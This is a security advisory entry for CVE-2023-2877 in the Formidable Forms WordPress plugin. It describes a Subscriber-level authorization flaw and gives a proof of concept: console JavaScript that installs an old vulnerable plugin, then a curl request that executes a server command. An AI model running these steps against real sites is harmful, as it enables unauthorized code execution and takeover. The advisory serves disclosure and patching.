Lucene search
Alex SanfordWPEX-ID:33765DA5-C56E-42C1-83DD-FCAAD976B402HistoryJun 05, 2023 - 12:00 a.m.
Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution
2023-06-0500:00:00
Alex Sanford
124
formidable forms
subscriber user
remote code execution
unauthorized plugin
security vulnerability
wordpress
plugin installation
exploit
rce command
0.002 Low
EPSS
Percentile
60.1%
The plugin does not adequately authorize the user or validate the plugin URL in its functionality for installing add-ons. This allows a user with a role as low as Subscriber to install and activate arbitrary plugins of arbitrary versions from the WordPress.org plugin repository onto the site, leading to Remote Code Execution.
1. As a Subscriber user, visit `/wp-admin/admin.php?page=formidable-welcome`
2. Run the following JavaScript code in the browser console:
var token = jQuery('a.button-primary.frm-button-primary')[0].href.replace(/^.*token=(\w+).*$/, '$1');
await fetch( `/wp-json/frm-admin/v1/install-addon?token=${token}&file_url=https://downloads.wordpress.org/plugin/wp-upg.2.19.zip` );
3. Note that version 2.19 of the `wp-upg` plugin has been installed, despite being closed and having a known security vulnerability. Any version of any WordPress.org plugin could be installed here.
4. For RCE with the `wp-upg` plugin, run the following `curl` command:
curl -i 'https://SITE_URL/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:id:NULL:NULL'Related
githubexploit
githubexploit
Exploit for CVE-2023-2877
2023-06-28 10:34:08
cvelist
cvelist
CVE-2023-2877 Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution
2023-06-27 13:17:12
wpvulndb
wpvulndb
Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution
2023-06-05 00:00:00
nvd
nvd
CVE-2023-2877
2023-06-27 14:15:11
cve
cve
CVE-2023-2877
2023-06-27 14:15:11
prion
prion
Remote code execution
2023-06-27 14:15:00
openvas
openvas
WordPress Formidable Forms Plugin < 6.3.1 RCE Vulnerability
2023-06-29 00:00:00